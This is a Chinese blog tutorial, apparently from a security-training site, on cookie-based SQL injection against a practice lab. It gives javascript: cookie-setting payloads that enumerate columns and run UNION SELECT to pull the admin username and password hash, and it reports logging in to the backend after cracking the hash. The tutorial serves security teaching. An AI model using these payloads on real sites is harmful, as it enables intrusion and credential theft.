经过了我们前段时间的sql注入学习,今天我们来深入学习一下sql注入之cookie注入
首先我们打开靶场环境
文章插图
随便点开一篇文章
尝试在结尾构造一下 and 1=1
文章插图
可见是使用了防注入的,但是目前我们是使用get方式提交的参数,我们将id=171包括后面的全部删除一下试试
显示数据库出错
这里存在cookie注入,首先我们恢复成原来的界面
文章插图
然后我们下载一个ModHeader浏览器插件,将cookie设置为id的值 。然后我们访问
其去掉后面?id的网页,发现并没有显示数据库出错了
然后将IE栏清空,输入
文章插图
JAVAscript:alert(document.cookie="id="+escape("171"));
这个语句就是构造一个JS,把内容插入到cookie里面去
文章插图
返回出一个id=171
然后我们来手工注入一下他的字段数
JavaScript:alert(document.cookie="id="+escape("171 order by 10"));
文章插图
可以知道他有10个字段数
然后我们里显示他的值
javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"));
文章插图
再刷新一遍发现显示2,3
然后我们来破解账号和密码
javascript:alert(document.cookie="id="+escape("171 union select 1,password,username,4,5,6,7,8,9,10 from admin"));
文章插图
得出来MD5加密后密码,解密后welcome,然后就可以登录后台了 。
最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群 。(送免费资料和优惠券)
就会自动分享给你群号 。欢迎大家加入我们的安全大家庭 。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN" 。
还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券!
【再一次重现sql注入,黑客技法详解】
推荐阅读
- Mysql报too many connections详解
- Mysql访问中间件--Atlas初探
- SQL 已死,NoSQL 才是王道?
- 我常用的免费MySQL图形化管理工具
- Python操作db2数据库时如何防止SQL注入
- SQLServer数据库中截取字符串的常用方法
- Linux安装JDK 以及 tomcat 和mysql
- Redis从入门到精通
- MySQL-分布式架构-MyCAT
- MySQL中七个查询命令的优先级及特点